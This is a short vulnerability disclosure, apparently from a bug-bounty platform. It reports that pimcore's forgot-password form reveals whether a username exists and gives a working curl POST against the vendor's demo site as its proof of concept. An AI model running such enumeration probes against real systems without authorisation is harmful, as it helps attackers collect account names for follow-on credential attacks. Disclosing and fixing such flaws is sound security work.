Observable Response Discrepancy in pimcore/pimcore
Reported on
Aug 31st 2021
✍️ Description
It is possible to enumerate usernames via the forgot password functionality
🕵️♂️ Proof of Concept
When entering an username that is not registered in the application the response reads "User unknown". The following curl command demonstrates this:
curl -i -s -k -X $'POST' \
-H $'Host: demo.pimcore.fun' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Referer: https://demo.pimcore.fun/admin/login/lostpassword' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 82' -H $'Origin: https://demo.pimcore.fun' -H $'Dnt: 1' -H $'Upgrade-Insecure-Requests: 1' -H $'Te: trailers' -H $'Connection: close' \
-b $'PHPSESSID=6f1c18e8cc8503830b327897c8fb8678' \
--data-binary $'username=RandomUsername&csrfToken=a1b983212b46f65236f802e94253af4dc2d6320e&submit=' \
$'https://demo.pimcore.fun/admin/login/lostpassword'
💥 Impact
It is possible to enumerate usernames of registered users in the application. An attacker can then chain this information with other attacks.